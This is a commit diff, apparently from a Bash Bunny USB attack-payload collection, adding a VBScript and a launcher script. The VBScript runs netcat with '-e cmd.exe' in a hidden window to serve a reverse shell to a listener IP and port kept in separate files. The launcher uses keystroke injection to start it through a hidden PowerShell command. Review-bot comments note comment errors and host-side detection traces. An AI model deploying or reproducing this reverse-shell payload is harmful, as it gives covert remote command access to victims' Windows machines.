RAZ_VBScript
This payload executes a VBScript as the payload. The sample VBScript creates a netcat reverse shell, but any VBScript can be substituted. netcat.exe must be sourced elsewhere.
pull/40/head
parent
3bc10fa135
commit
938be26260
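--- /dev/null
+++ b/a.vbs
@@ -0,0 +1,162 @@
+Option Explicit
+
+'==============================================================================
+' Title: a.vbs
+' Author: RalphyZ
+' Version: 1.0
+' Target: Windows 7+
+'
+' Description:
+' This VBScript is used by a BashBunny payload to
+' to create a netcat reverse shell. The netcat listener
+' IP Address and Port are stored in separate files - so that
+' Red Teams can quickly change information. The "IncrementPort"
+' subroutine will increase the port number by 1 every time the
+' script is called. This is so that you can start multiple
+' listeners while doing a PenTest, and grab multiple reverse
+' shells in one trip. Uncomment that if you want the auto-increment
+'
+' Note: You must put the netcat executable in the strReverseShellPath directory
+'==============================================================================
+
+' Declare Constants
+Const ForReading = 1
+Const ForWriting = 2
+
+' Declare Global Variables
+Dim strListenerPort, strNewListenerPort, strListenerIP
+Dim objFSO, objFile, strCurrentDirectory
+Dim strNetCatEXE, strReverseShellPath, strListnerPortFile, strListenerIPFile
+
+' The netcat executable name
+strNetCatEXE = "nc.exe"
+
+' The folder location
+strReverseShellPath = "\payloads\library\RAZ_ReverseShell\"
+
+' The file containing the listener port
+strListnerPortFile = "listener_port.txt"
+
+' The file containing the listener ip address
+strListenerIPFile = "listener_ip.txt"
+
+' Create a File System Object
+Set objFSO = CreateObject("Scripting.FileSystemObject")
+
+strCurrentDirectory = FindCurrentDirectory()
+
+' Read the Host IP Address (where the listener resides)
+ReadHostIP
+
+' Read the listener port
+ReadPort
+
+' Increment the listener port - for multiple shells
+' Great for Red Teams
+'IncrementPort
+
+' Start NetCat Reverse Shell
+StartNetCat
+
+'==============================================================================
+' Name: FindCurrentDirectory
+' Arguments: None
+' Return Value: None
+' Description: Find the netcat executable
+'==============================================================================
+Function FindCurrentDirectory
+Dim objDrives, d
+
+' Set default return value
+FindCurrentDirectory = ""
+
+' Search all drives for the netcat exe
+Set objDrives = objFSO.Drives
+For Each d in objDrives
+If (objFSO.FileExists(d + strReverseShellPath + strNetCatEXE)) Then
+FindCurrentDirectory = d + strReverseShellPath
+End if
+Next
+End Function
+
+'==============================================================================
+' Name: ReadHostIP
+' Arguments: None
+' Return Value: None
+' Description: Read the listener IP
+'==============================================================================
+Sub ReadHostIP()
+' Opens the file for reading
+Set objFile = objFSO.OpenTextFile(strCurrentDirectory + strListenerIPFile , ForReading)
+
+' Read the host IP
+strListenerIP = objFile.ReadAll
+
+' Close the file
+objFile.Close
+End Sub
+
+
+'==============================================================================
+' Name: ReadPort
+' Arguments: None
+' Return Value: None
+' Description: Read the listener port
+'==============================================================================
+Sub ReadPort()
+' Opens the file for reading
+Set objFile = objFSO.OpenTextFile(strCurrentDirectory + strListnerPortFile , ForReading)
+
+' Read the listener port
+strListenerPort = objFile.ReadAll
+
+' Close the file
+objFile.Close
+End Sub
+
+'==============================================================================
+' Name: IncrementPort
+' Arguments: None
+' Return Value: None
+' Description: Read the listener port, increment the counter by 1, and write
+' the new value
+'==============================================================================
+Sub IncrementPort()
+' Increment the listener port
+strNewListenerPort = strListenerPort + 1
+
+' Open the file that contains the listener port for writing
+Set objFile = objFSO.OpenTextFile(strCurrentDirectory + strListnerPortFile , ForWriting)
+
+' Write the new (incremented) port
+objFile.WriteLine strNewListenerPort
+
+' Close the file
+objFile.Close
+End Sub
+
+'==============================================================================
+' Name: StartNetCat
+' Arguments: None
+' Return Value: None
+' Description: Start netcat on the appropriate port
+'==============================================================================
+Sub StartNetCat()
+Dim strNetCat, strCommand, objShell
+
+' Build the path to the netcat executable
+strNetCat = objFSO.BuildPath(strCurrentDirectory, strNetCatEXE)
+
+' Create the command string to run netcat on the correct ip and port,
+' and serve cmd.exe to the listener
+strCommand = strNetCat + " -nv " + strListenerIP + " " + strListenerPort + " -e cmd.exe"
+
+' Create the WScript Shell object
+Set objShell = WScript.CreateObject ("WScript.Shell")
+
+' Run the command (' , 0'= hidden)
+objShell.run strCommand, 0
+
+' Free the object from memory
+Set objShell = Nothing
+End Sub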
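Review bot: The FindCurrentDirectory header documents `Return Value: None`, but the function returns the drive-qualified folder (or `""` when nothing matches), and the main body never checks for `""` before ReadHostIP and ReadPort build file paths from it; the header should read `' Return Value: Folder that holds nc.exe, or "" if no drive has it`. The loop has no `Exit For`, so when several volumes carry `\payloads\library\RAZ_ReverseShell\nc.exe` the last one enumerated wins, and that folder name differs from this payload's RAZ_VBScript, which the top comment should spell out. For anyone analysing the technique, the host-side trace is a Windows Script Host process starting nc.exe from a removable volume with `-e cmd.exe` in a hidden window (`objShell.run strCommand, 0`), which process-creation logging with command lines records.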
|
@ -0,0 +1 @@
|
|||
192.168.1.100
|
|
@ -0,0 +1 @@
|
|||
4444
|
|
@ -0,0 +1,35 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: RAZ_VBScript
|
||||
# Author: RalphyZ
|
||||
# Version: 1.0
|
||||
# Target: Windows 7+
|
||||
# Dependencies: VBScript (a.vbs) in the switch folder with this file
|
||||
#
|
||||
# Description: Executes a VBScript, concealed in a hidden PowerShell window
|
||||
#
|
||||
# Colors:
|
||||
# Green.....................Working
|
||||
# White.....................Completed without error
|
||||
# Light-Blue (blinking).....a.vbs was not found
|
||||
|
||||
LED G
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
# Get the switch position
|
||||
source bunny_helpers.sh
|
||||
|
||||
# Check if a.vbs is present
|
||||
if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/a.vbs" ] ; then
|
||||
LED B G 100
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Run the VBScript
|
||||
QUACK GUI r
|
||||
QUACK DELAY 100
|
||||
QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\a.vbs')"
|
||||
QUACK ENTER
|
||||
|
||||
# Green LED for finished
|
||||
LED R G B
|
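Review bot: The closing comment `# Green LED for finished` does not match the code beneath it: `LED R G B` is white, which the header lists as "Completed without error", so the comment should read `# White LED for finished`. White is also set as soon as the keystrokes have been sent, not once a.vbs has run, so it only signals that injection completed; the Colors block in the header could say so. On the host this leaves a Run-dialog launch of `powershell -WindowStyle Hidden` that queries `win32_volume` for the label BashBunny, which PowerShell and process command-line logging capture.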